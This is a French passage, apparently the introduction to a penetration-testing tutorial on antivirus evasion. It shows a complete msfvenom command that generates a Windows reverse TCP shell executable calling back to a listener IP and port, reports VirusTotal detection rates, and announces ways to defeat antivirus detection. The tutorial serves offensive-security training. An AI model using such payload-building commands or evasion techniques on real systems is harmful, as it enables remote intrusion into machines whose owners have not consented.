Sommaire

Introduction

La meilleure défense étant bien souvent l’attaque, les équipes de défense font évoluer leurs techniques en prenant en compte celles des attaquants.

C’est pourquoi les payloads générés par le framework Metasploit sont de plus en plus connus et donc de plus en plus détectables par les antivirus ou bien par les IDS/IPS.

Prenons le cas d’un simple payload généré par MSFvenom :

root@kali:/tmp# msfvenom -a x86 --platform windows -p 
windows/shell/reverse_tcp LHOST=192.168.171.152 LPORT=3434  -f exe -o 
/tmp/malicious.exe  
No encoder or badchars specified, outputting raw payload  
Payload size: 341 bytes  
Final size of exe file: 73802 bytes  
Saved as: /tmp/malicious.exe

L’analyse de ce simple payload ne contenant aucun moyen de camouflage peut être réalisée par le site VirusTotal (https://www.virustotal.com) :

images/14EP01.png

VirusTotal est un service gratuit qui analyse les fichiers et URL suspects et facilite la détection rapide des virus, vers, trojans et tous types de malwares.

Au sein du VirusTotal, 51 antivirus sur 71 intègrent ce payload au sein de leurs bases antivirales, pouvant ainsi mettre la tentative de compromission de la cible en échec. Néanmoins, MSFvenom intègre des fonctionnalités permettant de tenter de déjouer les protections antivirales.